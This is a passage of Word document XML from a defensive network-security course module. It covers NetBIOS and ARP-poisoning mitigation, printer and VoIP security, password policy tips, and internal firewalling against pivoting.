      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in network configuration: on the network adapter, select Internet Protocol Version and go to properties. I</w:t>
      </w:r>
      <w:r w:rsidR="00B702DC">
        <w:t>n advanced</w:t>
      </w:r>
      <w:r>
        <w:t>/WINS select “Disable NetBIOS over TCP/IP”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332DB7BE" w14:textId="098BE841" w:rsidR="00F97BE9" w:rsidRDefault="00F97BE9" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>ARP poisoning mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ACA005" w14:textId="7E40531B" w:rsidR="00D85F9C" w:rsidRDefault="001B527E" w:rsidP="00D85F9C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>To prevent Man-in-the-middle attack, too</w:t>
      </w:r>
      <w:r w:rsidR="00FE07FD">
        <w:t xml:space="preserve">ls such as </w:t>
      </w:r>
      <w:r w:rsidR="004751E4">
        <w:t>ArpOn, which inspect ARP packets,</w:t>
      </w:r>
      <w:r w:rsidR="00FE07FD">
        <w:t xml:space="preserve"> can be used.</w:t>
      </w:r>
      <w:r w:rsidR="003D2902">
        <w:t xml:space="preserve"> Another solution is to add a “certification” based on a cross-checking of the ARP responses. By doing so, uncertified ARP responses are blocked.</w:t>
      </w:r>
      <w:r w:rsidR="004751E4">
        <w:t xml:space="preserve"> Activating such an option on the DHCP server will help certifying  both static and dynamic addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C13B55" w14:textId="4A7B6649" w:rsidR="00D85F9C" w:rsidRDefault="00D85F9C" w:rsidP="00D85F9C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Some vendors are implementing ARP security or Dynamic ARP Inspection (DAI). DAI rejects invalid and malicious ARP packets. It does so</w:t>
      </w:r>
      <w:r w:rsidR="00E7335E">
        <w:t xml:space="preserve"> by relying on a DHCP server which listens to the DHCP messages and builds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a database of valid couples (MAC, IP)</w:t>
      </w:r>
      <w:r w:rsidR="00595FAC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FB7158">
        <w:t xml:space="preserve"> The switch will then drops any ARP packet whom MAC and IP addresses are not in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355704E6" w14:textId="65BA19B1" w:rsidR="001B527E" w:rsidRPr="00F97BE9" w:rsidRDefault="004D1790" w:rsidP="007240E1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>NAC</w:t>
      </w:r>
      <w:r w:rsidR="0080419C">
        <w:t>, if correctly configured,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also provides an additional security as it prevent un</w:t>
      </w:r>
      <w:r w:rsidR="0080419C">
        <w:t>authorized access to the network</w:t>
      </w:r>
      <w:r w:rsidR="00A548AB">
        <w:t xml:space="preserve"> (or at least make it more difficult).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3520C379" w14:textId="5ECF7A6F" w:rsidR="002A2482" w:rsidRDefault="00492AA4" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Printer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A8B1D" w14:textId="6093A757" w:rsidR="002A2482" w:rsidRDefault="00F97BE9" w:rsidP="002A2482">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>First</w:t>
      </w:r>
      <w:r w:rsidR="002A2482">
        <w:t xml:space="preserve">, printers must not be connected to the </w:t>
      </w:r>
      <w:r>
        <w:t>internet;</w:t>
      </w:r>
      <w:r w:rsidR="002A2482">
        <w:t xml:space="preserve"> this can lead to attack from the outside and give an attacker an entry point in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B804C" w14:textId="3EB9A73E" w:rsidR="00B54CD1" w:rsidRDefault="00DB3FD9" w:rsidP="002A2482">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Employees should always lock the copy room to avoid physical access to the printer.</w:t>
      </w:r>
      <w:r w:rsidR="003574F3">
        <w:t xml:space="preserve"> Administrators should sandbox printers in VLAN only accessible via a print server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7351CBC3" w14:textId="2CB2A695" w:rsidR="00B54CD1" w:rsidRDefault="00B54CD1" w:rsidP="002A2482">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>There are no other real countermeasures yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD77EC" w14:textId="1AB487B0" w:rsidR="005B5527" w:rsidRDefault="005B5527" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VoIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC620D0" w14:textId="0C2313E0" w:rsidR="005B5527" w:rsidRDefault="009F2ED3" w:rsidP="005B5527">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Majority of business do not think to security when upgrading from analog phone to VoIP as they assume it should not be different. However, VoIP phone are IP enabled and that means they are vulnerable to the same attack than other IP devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE3C56" w14:textId="0A9E89E6" w:rsidR="009F2ED3" w:rsidRDefault="009F2ED3" w:rsidP="005B5527">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Some attacks against VoIP are not easy to detect and a toll fraud might be detected too late and leave a hole in the company’s finance.</w:t>
      </w:r>
      <w:r w:rsidR="005717F1">
        <w:t xml:space="preserve"> Monitoring log for unknown or suspicious number can help detecting this attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77978A5D" w14:textId="26F59E3E" w:rsidR="007D6F75" w:rsidRDefault="007D6F75" w:rsidP="005B5527">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Like for any other connected devices, some basic measures can greatly improve the security level of a VoIP network. For instance, regularly changing the passwo</w:t>
      </w:r>
      <w:r w:rsidR="0044755C">
        <w:t>rd and not letting default ones (strong passwords should be used and not “1234”).</w:t>
      </w:r>
      <w:r w:rsidR="00326657">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F82538">
        <w:t>Encryption can be added to avoid sniffing on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3791B5" w14:textId="3DE16300" w:rsidR="00326657" w:rsidRDefault="00326657" w:rsidP="005B5527">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Using a VPN would be a way to ensure data confidentiality for users that are not on site.</w:t>
      </w:r>
      <w:r w:rsidR="00793626">
        <w:t xml:space="preserve"> Moreover, a SIP firewall can be deployed to filter packets and block any suspicious traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2699B50B" w14:textId="7C62DA26" w:rsidR="00BF0C6E" w:rsidRPr="005B5527" w:rsidRDefault="00BF0C6E" w:rsidP="005B5527">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Also, using NAC and quarantine VLAN could be a difficult measures to bypass without the appropriate material (see bypassin</w:t>
      </w:r>
      <w:r w:rsidR="00B20E98">
        <w:t>g NAC using a BeagleBone and NACK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ered). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD80D67" w14:textId="7DD45713" w:rsidR="00073A80" w:rsidRDefault="00073A80" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigate post exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC7744" w14:textId="2DA2F8EC" w:rsidR="001E4B67" w:rsidRPr="001E4B67" w:rsidRDefault="001E4B67" w:rsidP="001E4B67">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>If an attacker successfully compromised one machine of the network, it is important that some measures will still prevent him from getting Domain Admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5AF3DB" w14:textId="5E816D88" w:rsidR="00C2267B" w:rsidRDefault="00073A80" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2653E807" w14:textId="4EBBB02F" w:rsidR="00C2267B" w:rsidRPr="00C2267B" w:rsidRDefault="00C2267B" w:rsidP="00C2267B">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>See Module 2 “System hardening”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AF770" w14:textId="2E501E8D" w:rsidR="00073A80" w:rsidRDefault="00073A80" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Ref520790253"/>
      <w:r>
        <w:t>Passwords</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="52B0E256" w14:textId="1B4D256A" w:rsidR="002A2C61" w:rsidRDefault="002D1560" w:rsidP="002A2C61">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Passwords are still the most common way to authenticate to get access to a network or a resource. This mean that an attacker who managed to get an employee’s password can access to its data and steal its identity.</w:t>
      </w:r>
      <w:r w:rsidR="00C22FE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A10A34" w14:textId="33F55107" w:rsidR="00C22FE6" w:rsidRDefault="00C22FE6" w:rsidP="002A2C61">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Are weak passwords really used in professional and personal life? This might sound like a dummy question but the answer is yes.  Passwords like “</w:t>
      </w:r>
      <w:r w:rsidRPr="005472ED">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="005472ED">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="005472ED">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>letmein</w:t>
      </w:r>
      <w:r>
        <w:t>” are still in the top 10 of the most used password in 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17811D" w14:textId="501F8554" w:rsidR="00434236" w:rsidRDefault="00FF7DB2" w:rsidP="002A2C61">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Having a password policy to prevent users from choosing “</w:t>
      </w:r>
      <w:r w:rsidRPr="005472ED">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” as password might be a good </w:t>
      </w:r>
      <w:r w:rsidR="004B4F8D">
        <w:t>beginning</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00434236">
        <w:t xml:space="preserve"> A strong password in 2018 is a minimum 10 characters password with at least three of the following criteria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E46BF" w14:textId="77777777" w:rsidR="00434236" w:rsidRDefault="00434236" w:rsidP="00434236">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5771D" w14:textId="77777777" w:rsidR="00434236" w:rsidRDefault="00434236" w:rsidP="00434236">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF57D0" w14:textId="77777777" w:rsidR="00434236" w:rsidRDefault="00434236" w:rsidP="00434236">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lowercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82A9CC" w14:textId="77777777" w:rsidR="00434236" w:rsidRDefault="00434236" w:rsidP="00434236">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Special character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653255B4" w14:textId="11AA948E" w:rsidR="00C561F9" w:rsidRDefault="00E62BB1" w:rsidP="007B13A1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007B13A1">
        <w:t xml:space="preserve">his password </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="007B13A1">
        <w:t>needs to be changed regularly and difficult to guess by the others users or an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162E30B" w14:textId="391CB228" w:rsidR="00E62BB1" w:rsidRDefault="00E62BB1" w:rsidP="007B13A1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>However, a compliant password is not necessarily secure: “Companyname.2018” is not a good password even if it will pass the compliancy checks.</w:t>
      </w:r>
      <w:r w:rsidR="00DE7778">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002831E1">
        <w:t>Dictionary</w:t>
      </w:r>
      <w:r w:rsidR="00DE7778">
        <w:t xml:space="preserve"> words, </w:t>
      </w:r>
      <w:r w:rsidR="002831E1">
        <w:t>relatives’</w:t>
      </w:r>
      <w:r w:rsidR="00DE7778">
        <w:t xml:space="preserve"> names or birth dates are also to avoid in passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB6E97" w14:textId="11899A0A" w:rsidR="002831E1" w:rsidRDefault="002831E1" w:rsidP="007B13A1">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To sum up all of this, a good password is a password that defects attackers </w:t>
      </w:r>
      <w:r w:rsidR="007A1D12">
        <w:t>techniques</w:t>
      </w:r>
      <w:r w:rsidR="00B03C79">
        <w:t xml:space="preserve"> which means it is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4BCB7" w14:textId="52585680" w:rsidR="00B03C79" w:rsidRDefault="00B03C79" w:rsidP="00B03C79">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Long enough to defect brute-force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB594C" w14:textId="557C10FC" w:rsidR="00B03C79" w:rsidRDefault="00B03C79" w:rsidP="00B03C79">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Not using words from existing languages to defect dictionary attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A47E2C" w14:textId="1240308F" w:rsidR="00B03C79" w:rsidRDefault="00B03C79" w:rsidP="00B03C79">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Not related to the person to defect social engineering attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393A1E9" w14:textId="0FF446A5" w:rsidR="00B03C79" w:rsidRDefault="00B03C79" w:rsidP="00B03C79">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Easy to remember to not write it down to defect spying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2946D7F9" w14:textId="1F35AB39" w:rsidR="00B03C79" w:rsidRDefault="00B03C79" w:rsidP="00B03C79">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Not following common patterns to defect hybrid attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A91767" w14:textId="77777777" w:rsidR="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Tips for creating a secure password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFA9EE" w14:textId="077D4007" w:rsidR="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Start with a personally memorable sentence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>This month is Jimmy’s 45th birthday</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54008F50" w14:textId="1E016C9F" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Add personal memorable variations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486D358" w14:textId="42843C61" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Some example custom rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3366A44C" w14:textId="31229994" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Keep first two letters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B9BC79" w14:textId="7D109EE8" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Keep punctuation and capitals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07801EAA" w14:textId="73F5DCC0" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Keep numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592515C8" w14:textId="7870794F" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E420344" w14:textId="75A61815" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00650AF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00650AF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mo</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t xml:space="preserve">nth </w:t>
      </w:r>
      <w:r w:rsidRPr="00650AF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00650AF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ji</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t>mmy</w:t>
      </w:r>
      <w:r w:rsidRPr="00650AF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00650AF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t xml:space="preserve">th </w:t>
      </w:r>
      <w:r w:rsidRPr="00650AF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>bi</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1D12">
        <w:t>rthday</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B049B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ThmoisJi’s45bi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258422BE" w14:textId="7FB3183B" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:lastRenderedPageBreak/>
        <w:t>If you don’t like birthdays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935A119" w14:textId="6B794141" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t xml:space="preserve">Sport results, song lyrics, or any other sentence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79722042" w14:textId="19DC61B6" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4C7E90" w14:textId="2B5302B7" w:rsidR="007A1D12" w:rsidRPr="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Easy to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A01415" w14:textId="3F1D4ED2" w:rsidR="007A1D12" w:rsidRDefault="007A1D12" w:rsidP="007A1D12">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1D12">
        <w:t>Very hard to crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6265AE7F" w14:textId="1C98C566" w:rsidR="00CE55C2" w:rsidRDefault="00CE55C2" w:rsidP="00CE55C2">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Another good practice is to use Password managers (like KeePass) which allow users not to remember their pas</w:t>
      </w:r>
      <w:r w:rsidR="00753664">
        <w:t>swords (</w:t>
      </w:r>
      <w:r w:rsidR="00710398">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00753664">
        <w:t xml:space="preserve"> to share passwords between teams’ members)</w:t>
      </w:r>
      <w:r w:rsidR="004C6692">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9AD74" w14:textId="64D0EC46" w:rsidR="00710398" w:rsidRPr="007A1D12" w:rsidRDefault="00710398" w:rsidP="00CE55C2">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Consider also using a multi-factor authentication such has token, phone or biometrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490421FF" w14:textId="3D7A40FF" w:rsidR="00073A80" w:rsidRDefault="00073A80" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7529E878" w14:textId="585B805B" w:rsidR="009346AE" w:rsidRDefault="00D93796" w:rsidP="00D93796">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Believing that a Firewall rules can prevent an attacker from accessing an internal machine on your network is credulous.</w:t>
      </w:r>
      <w:r w:rsidR="00D37FBC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD5218">
        <w:t>If an attacker successf</w:t>
      </w:r>
      <w:r w:rsidR="00E675D5">
        <w:t>ully compromised a machine, he can use it to attack other hosts and network that are not necessarily reachable from the outside.</w:t>
      </w:r>
      <w:r w:rsidR="009346AE">
        <w:t xml:space="preserve"> In a real-world scenario, an attacker could compromise a low-security web </w:t>
      </w:r>
      <w:r w:rsidR="00366211">
        <w:t>server, which</w:t>
      </w:r>
      <w:r w:rsidR="008D4F7E">
        <w:t xml:space="preserve"> will give</w:t>
      </w:r>
      <w:r w:rsidR="00D97501">
        <w:t xml:space="preserve"> him</w:t>
      </w:r>
      <w:r w:rsidR="00B36FD8">
        <w:t xml:space="preserve"> access to the</w:t>
      </w:r>
      <w:r w:rsidR="008D4F7E">
        <w:t xml:space="preserve"> DMZ or </w:t>
      </w:r>
      <w:r w:rsidR="00B36FD8">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidR="008D4F7E">
        <w:t xml:space="preserve">internal </w:t>
      </w:r>
      <w:r w:rsidR="00B36FD8">
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="008D4F7E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C17E4D" w14:textId="379FF89C" w:rsidR="005277D0" w:rsidRPr="005277D0" w:rsidRDefault="001238C6" w:rsidP="00D93796">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>To complicate attackers’ tasks</w:t>
      </w:r>
      <w:r w:rsidR="0070440B">
        <w:t>, Firewall should be deployed internally too and network should be divided in multiple area.</w:t>
      </w:r>
      <w:r w:rsidR="004E1BA5">
        <w:t xml:space="preserve"> A machine should only have access to </w:t>
      </w:r>
      <w:r w:rsidR="003513EB">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003512AE">
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidR="004E1BA5">
        <w:t xml:space="preserve"> she need</w:t>
      </w:r>
      <w:r w:rsidR="00D0549A">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004E1BA5">
        <w:t xml:space="preserve"> and no</w:t>
      </w:r>
